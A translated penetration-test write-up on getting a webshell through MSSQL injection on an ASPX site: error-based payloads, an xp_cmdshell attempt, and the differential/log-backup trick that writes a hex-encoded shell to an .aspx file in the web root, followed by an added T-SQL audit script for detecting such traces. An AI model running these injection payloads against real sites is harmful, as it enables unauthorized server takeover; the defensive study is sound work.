0x00 Preface
A scanner flagged a website with directory browsing enabled, which is how this article came about ...
Background knowledge:
1. Directory browsing
In my personal view, directory browsing is a significant vulnerability: "when a directory has no default document, the server lists every file name and file in that directory." If a site has this misconfiguration and the attacker knows the directory name, the files under those directories can be viewed.
2. Conditions for the differential backup technique
- The site's absolute path
- Write permission on that path
- Sufficient permissions on the current database
0x01 Body
The site was improperly configured, resulting in directory browsing; looking at the front page source turned up several directories.
Opening one of them at random produced an error, showing that the webmaster had not suppressed error messages.
That is also an information leak.
But the files in those directories usually need parameters to execute, and we do not know the parameter names, so there is no way to use them.
Back to the front-end login page to take a look.
Trying it, I found that the login form has injection and that the admin account has a weak password; in other words, you can log in with a universal password.
I originally wanted to find a file upload for a direct getshell, but there was none. I did find that the site uses KindEditor, and I found the site's absolute path.
Since there is injection at the front-end login, the backend generally has plenty of injection points too; if one can be found, a getshell is possible with the absolute path.
OK, an injection point was found, but so far the database type is unknown. The usual combination is ASPX + MSSQL, and since the site showed error messages earlier, try MSSQL error-based injection:
%' and 1=@@version --a
It is an MSSQL database; check the current user identity:
%' and 1=user --a
The permission level is dbo, not sa; try xp_cmdshell:
%';exec('master..xp_cmdshell whoami') --a
xp_cmdshell is not enabled, and dbo permissions are not sufficient to enable it, so the only option left is to try writing a webshell with a differential backup.
1. Get the current database name
%' and 1=db_name() --a
2. Back up the current database
If the backup succeeds, the page returns the query result for %' on its own (because the statements are stacked, and the execution of the subsequent statements returns no results).
3. Create a table and write the webshell into it
%';create table cmd(a image) --a
%';insert into cmd(a) values (0xxxxx) --a  // hex value of the webshell
You can use tools found online for the hex conversion; the author used a small tool he wrote himself.
4. Make a second backup
%';backup log <database name> to disk = '<absolute path>\\abc.aspx'--
Here I write the webshell into a subdirectory, because directory browsing is enabled there and I can see exactly whether the file was generated.
After it is created successfully, try to connect.
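The traces this technique leaves on the database server are easy to audit for. The following T-SQL is an added example, not part of the original write-up: it checks msdb backup history for backups written to non-backup paths, looks for leftover image-column staging tables, and reviews the two preconditions (xp_cmdshell state, who holds backup rights). It assumes a sysadmin connection to the instance and the standard msdb history tables.

```sql
-- Added audit script (not from the original write-up). Run as sysadmin on
-- the instance being reviewed; assumes the default msdb history tables.

-- 1. Backup history: a BACKUP LOG / DIFFERENTIAL written to a path that is
--    not a .bak/.trn file (e.g. an .aspx under the web root) is the trace
--    this trick leaves, because msdb records every BACKUP destination.
SELECT bs.database_name,
       bs.backup_start_date,
       bs.type,                     -- 'L' = log, 'I' = differential, 'D' = full
       bs.user_name,                -- login that issued the BACKUP statement
       bmf.physical_device_name     -- destination given in TO DISK = '...'
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf
  ON bs.media_set_id = bmf.media_set_id
WHERE bmf.physical_device_name NOT LIKE '%.bak'
  AND bmf.physical_device_name NOT LIKE '%.trn'
ORDER BY bs.backup_start_date DESC;

-- 2. Tables with an image column in the current database, newest first:
--    the staging table for the shell bytes (like "cmd(a image)" above)
--    is usually left behind.
SELECT t.name AS table_name, t.create_date, c.name AS column_name
FROM sys.tables  AS t
JOIN sys.columns AS c  ON c.object_id = t.object_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
WHERE ty.name = 'image'
ORDER BY t.create_date DESC;

-- 3. Configuration the attacker probed first: is xp_cmdshell enabled?
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Who could run BACKUP at all: db_owner / db_backupoperator members of
--    the current database. The web application's login should be in
--    neither role; that removes the precondition for this technique.
SELECT dp.name AS principal_name, r.name AS role_name
FROM sys.database_role_members AS rm
JOIN sys.database_principals   AS r  ON r.principal_id  = rm.role_principal_id
JOIN sys.database_principals   AS dp ON dp.principal_id = rm.member_principal_id
WHERE r.name IN ('db_owner', 'db_backupoperator');

-- Remaining precondition: the SQL Server service account must be able to
-- write into the web root for the file to land there. Keeping the web root
-- outside the service account's write scope means the "write permission on
-- the absolute path" condition from the preface is never met.
```

Query 1 is the quickest win: the physical_device_name column records the exact path the attacker supplied, so a single row ending in a script extension is conclusive.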
0x02 Follow-up
- If you can use xp_cmdshell directly, try not to use a differential backup, because it generates a backup file; if the database is large, this has an impact.
- If there are any errors, please point them out.
That is the whole process of getting a shell via a differential backup.